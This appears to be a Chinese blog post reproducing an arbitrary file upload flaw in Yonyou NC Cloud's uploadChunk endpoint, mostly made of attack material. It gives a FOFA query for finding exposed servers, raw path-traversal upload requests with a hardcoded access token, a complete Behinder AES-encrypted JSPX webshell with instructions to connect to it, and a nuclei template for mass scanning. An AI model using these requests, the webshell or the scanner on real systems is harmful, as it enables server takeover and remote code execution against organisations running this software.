用友NC Cloud uploadChunk任意文件上传漏洞
漏洞简介
用友NC Cloud uploadChunk文件存在任意文件上传漏洞,攻击者通过此漏洞可实现上传木马文件,控制服务器。
漏洞复现
fofa语法:app="用友-NC-Cloud"
登录页面如下:
POC:
POST /ncchr/pm/fb/attachment/uploadChunk?fileGuid=/../../../nccloud/&chunk=1&chunks=1 HTTP/1.1
Host:
Content-Type: multipart/form-data; boundary=024ff46f71634a1c9bf8ec5820c26fa9
accessTokenNcc: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyaWQiOiIxIn0.F5qVK-ZZEgu3WjlzIANk2JXwF49K5cBruYMnIOxItOQ
--024ff46f71634a1c9bf8ec5820c26fa9
Content-Disposition: form-data; name="file"; filename="test.txt"
This website has an arbitrary file upload vulnerability
--024ff46f71634a1c9bf8ec5820c26fa9--
上传木马文件,使用冰蝎中自带的shell.jspx木马。上传成功后直接用冰蝎连接,不要使用浏览器访问木马文件。
POST /ncchr/pm/fb/attachment/uploadChunk?fileGuid=/../../../nccloud/&chunk=1&chunks=1 HTTP/1.1
Host:
Content-Type: multipart/form-data; boundary=024ff46f71634a1c9bf8ec5820c26fa9
accessTokenNcc: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyaWQiOiIxIn0.F5qVK-ZZEgu3WjlzIANk2JXwF49K5cBruYMnIOxItOQ
Content-Length: 806
--024ff46f71634a1c9bf8ec5820c26fa9
Content-Disposition: form-data; name="file"; filename="vuln.jspx"
<jsp:root xmlns:jsp="http://java.sun.com/JSP/Page" version="1.2"><jsp:directive.page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"/><jsp:declaration> class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}</jsp:declaration><jsp:scriptlet>String k="e45e329feb5d925b";session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec((session.getValue("u")+"").getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);</jsp:scriptlet></jsp:root>
--024ff46f71634a1c9bf8ec5820c26fa9--
使用冰蝎进行连接
nuclei批量yaml文件
id: yonyou_NCCloud_uploadChunk_upload
info:
name: 用友NC Cloud uploadChunk任意文件上传漏洞
author: afan
severity: critical
tags: yonyou,changjietong,bjxsec,yonyouoa
description: fofa app="畅捷通-TPlus"
variables:
file_name: "{{to_lower(rand_text_alpha(8))}}.txt"
file_content: "{{to_lower(rand_text_alpha(26))}}"
requests:
- raw:
- |
POST /ncchr/pm/fb/attachment/uploadChunk?fileGuid=/../../../nccloud/&chunk=1&chunks=1 HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=024ff46f71634a1c9bf8ec5820c26fa9
accessTokenNcc: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyaWQiOiIxIn0.F5qVK-ZZEgu3WjlzIANk2JXwF49K5cBruYMnIOxItOQ
Content-Length: 153
--024ff46f71634a1c9bf8ec5820c26fa9
Content-Disposition: form-data; name="file"; filename="{{file_name}}"
{{file_content}}
--024ff46f71634a1c9bf8ec5820c26fa9--
- |
GET /nccloud/{{file_name}} HTTP/1.1
Host: {{Hostname}}
req-condition: true
matchers:
- type: word
words:
- "{{file_content}}"
part: body
分类:
漏洞复现 / 用友
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】凌霞软件回馈社区,博客园 & 1Panel & Halo 联合会员上线
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】博客园社区专享云产品让利特惠,阿里云新客6.5折上折
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· 微软正式发布.NET 10 Preview 1:开启下一代开发框架新篇章
· 没有源码,如何修改代码逻辑?
· NetPad:一个.NET开源、跨平台的C#编辑器
· PowerShell开发游戏 · 打蜜蜂
· 凌晨三点救火实录:Java内存泄漏的七个神坑,你至少踩过三个!
2021-10-19 buu刷题笔记之文件上传